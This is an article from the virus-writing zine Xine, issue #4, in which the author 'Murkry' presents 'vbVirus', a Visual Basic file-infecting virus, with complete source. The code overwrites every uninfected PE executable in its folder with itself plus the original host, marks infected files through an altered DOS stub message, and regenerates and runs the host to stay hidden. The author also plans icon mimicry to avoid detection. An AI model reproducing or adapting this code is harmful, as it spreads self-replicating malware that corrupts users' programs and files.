/-----------------------------\ | Xine - issue #4 - Phile 304 | \-----------------------------/ vbVirus by Murkry Well I need to learn VB or at least to become more familiar with the coding debbugging ect in VB. So I did what was dear to my heart and created a virus. I knew that other vb virus code was out there but most were companion. So I used some tricks from ASM , and C that I knew and applied them to VB a little reading of the help file and I was on my way. The manner I use to infect the file, I believe standard High level Virus activity, copy the orginal host to the end of the virus and rewrite the entire file. On runing the infect file vbVirus Recreates an unifect file and shells out to it.The marker is I check for the letter M in a EXE header file. Read the sourcecode for more info. I use to dynamice byte arrays to copy the virus and the host into then concat them. I alter the exe stub so the msg now says "Program can not run due to Murkry Poisoning." I check for the M in Murkry Of course like other viruses that infect in this manner the icon is now the icon for the vbVirus. Which I am sure should be noticebale. Of course as soon as someone figures out the method MS uses to located icons in the .resc area we can copy that to our file and mimic the icon as well. I started this idea in vb code already, and can now find the first icon in an exe file. So I am sure it is a matter of time till this is done, then making viruses like cerebrus ,or Sandmans virus which was written in C, and other of this type will become more common place. Anyway read the code its sorta commented, Enjoy it I doubt I will update it any time soon. unless I really want to try to copy the icons in vb for some reason. I mean vb is nice but doing file access in it is like using a butter knife to cut cement. You can do it but why when you have a diamond tip saw. Murkry VERSION 5.00 Begin VB.Form VBinf Caption = "vbVirus by Murkry/IkX" ClientHeight = 1860 ClientLeft = 2730 ClientTop = 1740 ClientWidth = 6750 Icon = "VBinf.frx":0000 LinkTopic = "Form1" ScaleHeight = 1860 ScaleWidth = 6750 Begin VB.CommandButton cmdExit Caption = "E&xit" Height = 600 Left = 2055 TabIndex = 0 Top = 1215 Width = 1710 End End Attribute VB_Name = "VBinf" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Option Explicit Private Victim As String 'holds the victim file name Private HostLen As Long 'hods the victim file lenght Private vbArray() As Byte 'hold the vbVirus code Private hArray() As Byte 'holds the victims code Private lenght As Long Const MySize As Integer = 14336 'vbVirus size Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Private Sub Form_Initialize() Dim i As Long On Error GoTo vbVerror 'If an error show the form 'Error will occur if the user starts and 'ends the infected program to quickly 'other error now Write access... 'Copy the vbVirus code to an array to write out to a new file 'in a infect file we would only want to read in the vbVirus code 'which is why filecopy is not used here Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _ As #1 ReDim vbArray(MySize) Get #1, 1, vbArray Close #1 'now copy the victim,into its array 'and the append the two arrays into a file 'overwriting the existing victim file Victim = Dir(App.Path & "\" & "*.EXE") While Victim <> "" If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then Open App.Path & "\" & Victim For Binary Access Read As #1 ReDim hArray(LOF(1)) Get #1, 1, hArray Close #1 'To stop reinfection I make the DOS error msg say ' db "Program can not run due to Murkry Poisoning.",0dh,0ah,24h 'I then check if the M in Murkry is there in all new files 'Yes this will infect any .exe including DOS files but the 'infected exe will fail under anything but a Win32 enviroment 'displaying the above msg If hArray(&H69) <> &H4D Then i = hArray(&H3C) If hArray(i) = &H50 Then Open App.Path & "\" & Victim For Binary Access Write As #1 Put #1, , vbArray Put #1, MySize, hArray Close #1 End If 'Make sure its a PE file End If 'Simple check to make sure we are not reinfecting End If 'check for Current file name Victim = Dir() 'Get Next victim Wend 'All possible exe's have been infected by the vbVirus 'Now we need to generate the old host and spawn off it Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 lenght = LOF(1) - MySize If lenght <> 0 Then ReDim vbArray(lenght - 1) Get #1, MySize, vbArray Close #1 Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1 Put #1, , vbArray Close #1 'Routine to shell and wait for the host to close 'then delete the file. If while running the host the 'user copied that file he would have the orginal file back 'so this is one way to disinfect idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill App.Path & "\" & App.EXEName & ".eve" Else Close #1 End If End vbVerror: End Sub 'End the Init routines Private Sub cmdExit_Click() Unload Me End Sub